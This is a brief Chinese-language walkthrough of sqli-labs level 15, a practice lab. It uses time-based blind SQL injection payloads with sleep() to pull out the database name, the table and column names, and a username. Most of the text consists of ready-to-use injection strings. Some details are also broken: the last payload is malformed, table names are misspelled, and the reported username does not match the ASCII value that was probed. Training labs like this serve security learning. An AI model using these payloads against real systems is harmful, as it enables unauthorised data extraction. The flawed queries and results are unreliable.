sqli-labs第十五关详细教程

我们可以选择布尔盲注或者时间盲注

输入正确密码页面

输入错误页面

页面睡眠了，用时间盲注

 Dumb' and if(ascii(substr(database(),1,1))=115,sleep(3),1)#

当ascii值等于115时，执行sleep，所以得到ascii值为115，对照ascii码表为 s

用burp爆破一下得到所有的数据库名

1-115 2-101  3-99  4-117  5-114  6-105  7-116  8-121

所以数据库名字为security

查询表名

Dumb' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) #

爆破一下，1-101  2-109 3- 97 4-105  5-108 6-115    emalis第一个表

第二个表refers  第三个表uagents  第四个表users

Dumb' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep(5),1) #查询列名

爆破一下

第一个字段为id   第二个字段为username  第三个字段为password

 查询列的字段内容

Dumb' and if(ascii(substr(select username from security.users limit 0,1)1,1)=65,sleep(3),1)#

第一列内容为angelina